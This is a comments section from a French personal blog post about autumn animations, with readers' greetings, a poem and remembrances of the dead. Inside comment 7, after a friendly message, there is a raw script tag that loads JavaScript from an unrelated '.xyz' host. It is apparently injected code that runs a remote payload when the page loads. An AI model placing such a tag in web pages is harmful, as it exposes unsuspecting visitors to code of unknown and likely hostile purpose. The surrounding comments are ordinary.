• **En Automne**Anim.

  • Commentaires

    7
    Lundi 4 Novembre 2019 à 19:57

    Bonsoir Sellena 

    merci de tes visites

    j'aime tes creations d'automne toutes ces belles couleurs

    bisous du soir

     

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    6
    Tite-C.
    Dimanche 3 Novembre 2019 à 17:45

    **En Automne**Anim. à toi aussi

    https://image.noelshack.com/fichiers/2019/44/7/1572799479-herisson.gif

    5
    Dimanche 3 Novembre 2019 à 12:18
    4
    Dimanche 3 Novembre 2019 à 10:35

    Une petite page de vos cadeaux merci à tous

    Bonjour nous voilà en Novembre bonne semaine
    J'ai laissé mon cœur  me conduire ..
    Et venir jusqu'à toi et voir ton joli monde 
    Pour te souhaiter de passer
    Une très belle journée…
    Parsemée de tendresse et de joie..
    Mettre un peu de chaleur dans ton coeur..
    Pour t'apporter le bonheur..
    Un bateau remplit de douceurs..
    Avec toute mon Amitié
    Gros bisous de kikinette

    Une petite page de vos cadeaux merci à tous

    3
    daniel
    Dimanche 3 Novembre 2019 à 06:44

    Bonjour Sellena , merci pour ces belles images avec une pensée pour nos chers disparus.

    Un nouveau mois commence avec l'arrivée prochaine des fêtes de fin d'année.

    Bon dimanche , bisous de nous trois .

    2
    Vendredi 1er Novembre 2019 à 14:46

    Bonjour ma douce Selly

    Merci pour ta visite !  un jour spécial pour penser à nos  êtres chers

    qui nous manquent tant

    Bonne journée sous tes jolies animations 

    avec toute mon amitié et de gros bisous

    ton amie Janine

    Défis de Sissi

    1
    Vendredi 1er Novembre 2019 à 13:38

    SUPERBE ma Douce ! J'en prends une et la mets sur mon blog.

    Grand MERCI pour ce partage.

    Hélas ! si, mon épaule me fait souffrir depuis ce claquage et ce, malgré les calmants !

    Belle journée et gros bisous. Coryphee

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :